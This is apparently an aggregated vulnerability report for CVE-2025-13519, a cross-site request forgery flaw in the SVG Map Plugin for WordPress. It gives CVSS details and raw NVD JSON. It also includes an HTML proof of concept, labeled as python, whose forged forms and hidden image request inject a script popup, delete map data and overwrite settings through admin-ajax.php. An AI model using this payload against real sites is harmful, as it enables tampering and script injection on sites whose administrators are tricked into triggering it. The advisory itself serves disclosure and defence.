Security Vulnerability Report
中文
CVE-2025-13519 CVSS 6.1 MEDIUM

CVE-2025-13519

Published: 2026-01-07 12:16:48
Last Modified: 2026-04-15 00:35:42

Description

The SVG Map Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on multiple AJAX actions including 'save_data', 'delete_data', and 'add_popup'. This makes it possible for unauthenticated attackers to update the plugin's settings, delete map data, and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SVG Map Plugin by Saedi for WordPress ≤ 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-13519 - SVG Map Plugin WordPress --> <!-- This PoC demonstrates adding malicious popup content via CSRF --> <html> <body> <h1>CVE-2025-13519 CSRF PoC</h1> <p>Click the button below to trigger the CSRF attack.</p> <form action="http://target-site.com/wp-admin/admin-ajax.php" method="POST" id="csrfForm" style="display:none;"> <input type="hidden" name="action" value="add_popup" /> <input type="hidden" name="popup_content" value="<script>alert('XSS by CSRF')</script>" /> <input type="hidden" name="popup_title" value="Malicious Popup" /> </form> <button onclick="document.getElementById('csrfForm').submit();">Click Me</button> <!-- Auto-submit using img tag (more stealthy) --> <img src="http://target-site.com/wp-admin/admin-ajax.php?action=delete_data&map_id=1" style="display:none" onerror="console.log('CSRF attack triggered')" /> </body> </html> <!-- Save data CSRF PoC --> <form action="http://target-site.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="save_data" /> <input type="hidden" name="settings" value='{"map_width":"100%","map_height":"500px"}' /> <input type="submit" value="Submit" /> </form>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13519", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:48.473", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SVG Map Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on multiple AJAX actions including 'save_data', 'delete_data', and 'add_popup'. This makes it possible for unauthenticated attackers to update the plugin's settings, delete map data, and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin SVG Map Plugin para WordPress es vulnerable a falsificación de petición en sitios cruzados en todas las versiones hasta la 1.0.0, inclusive. Esto se debe a la validación de nonce ausente o incorrecta en múltiples acciones AJAX, incluyendo 'save_data', 'delete_data' y 'add_popup'. Esto hace posible que atacantes no autenticados actualicen la configuración del plugin, eliminen datos del mapa e inyecten scripts web maliciosos a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/svg-map-by-saedi/tags/1.0.0/svg-map-by-saedi.php#L90", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/svg-map-by-saedi/trunk/svg-map-by-saedi.php#L90", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5aaa97cc-4deb-43b6-957d-587834eca125?source=cve", "source": "[email protected]"}]}}